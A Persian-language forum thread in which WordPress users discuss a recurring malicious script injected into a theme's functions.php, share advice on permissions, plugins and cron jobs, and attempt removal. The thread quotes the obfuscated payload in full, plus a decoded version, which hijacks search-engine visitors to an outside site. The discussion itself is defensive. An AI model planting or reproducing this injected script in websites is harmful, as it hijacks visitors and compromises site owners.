وجود یک کد مخرب مخفی در بعضی سایت ها

[ikiosan]

با سلام

چند روز پیش سایت یکی از دوستان دچار یک مشکلی شده بود . وقتی از گوگل میخواستی وارد سایتش بشی ریدایرکت میشد به یه سایتی که موتور جستجو بود ...

من کد های قالبشو بررسی کردم دیدم تو فایل functions.php یه کد مخرب هست .

البته این کد رو کسی تو سایتش نذاشته بود . من احتمال میدم بخاطر نصب یک پلاگین مشکلدار بوده .

نکته جالب : وقتی این کد رو پاک میکردم 2 3 روز بعد دوباره برمیگشت . اینش واسم عجیب بود

<!--scounter--><script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>

تو انجمن های خارجی هم گشتم گفته بودن دسترسی فایل functions.php قالب رو همیشه رو 400 بزارید . من این کارو کردم فعلا که جواب داده .


هدف تاپیک اطلاع رسانی بود :wacko:


این کد از کجا اومده به نظر شما ؟ بهترین راه حل واسه جلوگیری از بازگشتش چیه ؟

 

[Javacl]

احتمالا هش میکنه،یعنی یه ویروس تو کامپیوترت دوستت هست،یوزر پس FTP یا wp-admin رو میفرسته برای هکر!

 

[pool]

var r = document.referrer,
t = "",
q;
if (r.indexOf("google.") != -1) t = "q";
if (r.indexOf("msn.") != -1) t = "q";
if (r.indexOf("yahoo.") != -1) t = "p";
if (r.indexOf("altavista.") != -1) t = "q";
if (r.indexOf("aol.") != -1) t = "query";
if (r.indexOf("ask.") != -1) t = "q";
if (t.length && ((q = r.indexOf("?" + t + "=")) != -1 || (q = r.indexOf("&" + t + "=")) != -1)) window.location = "ht" + "tp" + ":/" + "/go" + "ogo" + "sea" + "rc" + "h." + "bi" + "z/s" + "ea" + "rc" + "h.p" + "hp?" + "t" + "y=1&t" + "er" + "ms=" + r.substring(q + 2 + t.length).split("&")[0];

 

[Hamid2day]

دقیقا این مشکلو منم دارم
واقعا داره اذیتم می کنه
کلی صفحه پاک کردم
جالب اینجاست که کد به صورت رندوم در صفحات من پیدا میشه
اینو بخونید
How to remove "This site may harm your computer" from Google search results

 

[Hamid2day]

من اینجا پرسیدم
ولی هنوز به نتیجه نرسیدم

تروجان بر روی سرور

 

[Hamid2day]

دسترسی فایل ها یا پوشه ها رو 400 بزاریم؟

با سلام

چند روز پیش سایت یکی از دوستان دچار یک مشکلی شده بود . وقتی از گوگل میخواستی وارد سایتش بشی ریدایرکت میشد به یه سایتی که موتور جستجو بود ...

من کد های قالبشو بررسی کردم دیدم تو فایل functions.php یه کد مخرب هست .

البته این کد رو کسی تو سایتش نذاشته بود . من احتمال میدم بخاطر نصب یک پلاگین مشکلدار بوده .

نکته جالب : وقتی این کد رو پاک میکردم 2 3 روز بعد دوباره برمیگشت . اینش واسم عجیب بود

<!--scounter--><script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>

تو انجمن های خارجی هم گشتم گفته بودن دسترسی فایل functions.php قالب رو همیشه رو 400 بزارید . من این کارو کردم فعلا که جواب داده .


هدف تاپیک اطلاع رسانی بود :wacko:


این کد از کجا اومده به نظر شما ؟ بهترین راه حل واسه جلوگیری از بازگشتش چیه ؟

 

[Unforgiv3N]

دو حالت داره یا کامپیوتر شما ویروسی هست یا اینکه سرور که سایت اتون روشه ویروسی شده که اون هم از نبودن ClamAV و ایمن نبودن شاخه TMP سروری هست که سایت شما روشه ..

 

[Hamid2day]

والا من یکی موندم
اینو htaccess پاک می کنم باز خودش خودکار ساخته میشه..محتویاتشو پاک می کنم باز یک سری سایت دیگه داخش هک میشه.

دو حالت داره یا کامپیوتر شما ویروسی هست یا اینکه سرور که سایت اتون روشه ویروسی شده که اون هم از نبودن ClamAV و ایمن نبودن شاخه TMP سروری هست که سایت شما روشه ..

 

[Unforgiv3N]

دوسته عزیز htaccess را که پاک کنید خود Cpanel دوباره میسازه ولی محتویات اش فرق داره با اون چیزی که قبلا بوده ( محتویات پیش فرض هست ). cron job رو در Cpanel اتون چک کنید شاید کداتوماتیک گذاشته که هرچند وقت یکبار فایل htaccess با محتویات بد نوشته بشه و سایت شما Redirect بشه جای دیگه ..

شما مطمئن هستی که کل سرور ویروسی نشده ؟ چون شاید اشکال از شما نیست و سرور که سایت شما روش هست ویروسی شده .. ( مخصوصا پوشه tmp سرور ) که اگر ویروس روی اون بشینه همه سایتهای روی سرور رو آلوده میکنه

 

[سرام]

اقا این یاهوی منم 5 روز لوگ نمیشه .قبلا مثلا 3 تا از ایدیام لوگ نمیشد ولی چهارمیت ایدیم لوگ میشد وبرعکس ولی الان دیگه اصلا نمیتونم یاهو برم فقط از طریق سایت خود یاهو چت میکنم ولی اونم خیلی مضخرفه نه وب داری نه صدایی هیچی نداره.همه این چیزا هم از اون روزی شروع شد که یکدفعه یه عالمه صفحه تو اینترنت اکسپلورم تند تند باز میشد بعد اون اینجوری شد.دوستان به نظرتون من چیکار کنم تا یاهو کار کنه؟پروکسی سرور هم کردم نشد.

 

[ikiosan]

احتمالا هش میکنه،یعنی یه ویروس تو کامپیوترت دوستت هست،یوزر پس FTP یا wp-admin رو میفرسته برای هکر!

نه سید من یوزر پسشو عوض میکردم بازم اینجوری میشد . البته الان با تغییر پرمیشن فانشن مشکل حل شده :دی

دقیقا این مشکلو منم دارم
واقعا داره اذیتم می کنه
کلی صفحه پاک کردم
جالب اینجاست که کد به صورت رندوم در صفحات من پیدا میشه
اینو بخونید
How to remove "This site may harm your computer" from Google search results

من اینجا پرسیدم
ولی هنوز به نتیجه نرسیدم

تروجان بر روی سرور

بالا تو پست اول روش حل مشکل رو گفتم .

دسترسی فایل ها یا پوشه ها رو 400 بزاریم؟

دسترسی به فایل functions.php قالب

دو حالت داره یا کامپیوتر شما ویروسی هست یا اینکه سرور که سایت اتون روشه ویروسی شده که اون هم از نبودن ClamAV و ایمن نبودن شاخه TMP سروری هست که سایت شما روشه ..

کامپیوتر که ویروسی نیست . سرور هم نیست کاملا چک شده . واسه همین گیج شدم که این اصلا از کجا اومده . بیشترین شک من به پلاگین هاست

والا من یکی موندم
اینو htaccess پاک می کنم باز خودش خودکار ساخته میشه..محتویاتشو پاک می کنم باز یک سری سایت دیگه داخش هک میشه.

پرمیشنش روی چنده ؟

 

[ikiosan]

شما مطمئن هستی که کل سرور ویروسی نشده ؟ چون شاید اشکال از شما نیست و سرور که سایت شما روش هست ویروسی شده .. ( مخصوصا پوشه tmp سرور ) که اگر ویروس روی اون بشینه همه سایتهای روی سرور رو آلوده میکنه

سرور چک شده و پاک بود . چون بجز اون سایت چند تای دیگه هم روی همون سرور هستن که مشکلی نداشتن

 

[sajad1745]

تروجان های p,a,c,k,e,d وردپرس و روش مقابله با آنها

 

[Moostafa]

این کدها فکر میکنم به احتمال خیلی زیاد از پلاگین ها هستند .
چون یه ماه پیش یه پلاگین نصب فرمودیم که این کد به فایل functions.php اضافه شد. بعد پلاگین رو پاک کردم و دسترسی رو 400 کردم تا درست شد.

 

[sajad1745]

این کدها فکر میکنم به احتمال خیلی زیاد از پلاگین ها هستند .
چون یه ماه پیش یه پلاگین نصب فرمودیم که این کد به فایل functions.php اضافه شد. بعد پلاگین رو پاک کردم و دسترسی رو 400 کردم تا درست شد.

نصب پلاگین از منابع نا معتبر هم دلیل این مشکل هست
ولی بیشتر من توی نسخه های وردپرسی دیدم
شما فایل revisions-js.php رو توی پوشه wp-adm/js/ بررسی کنید ...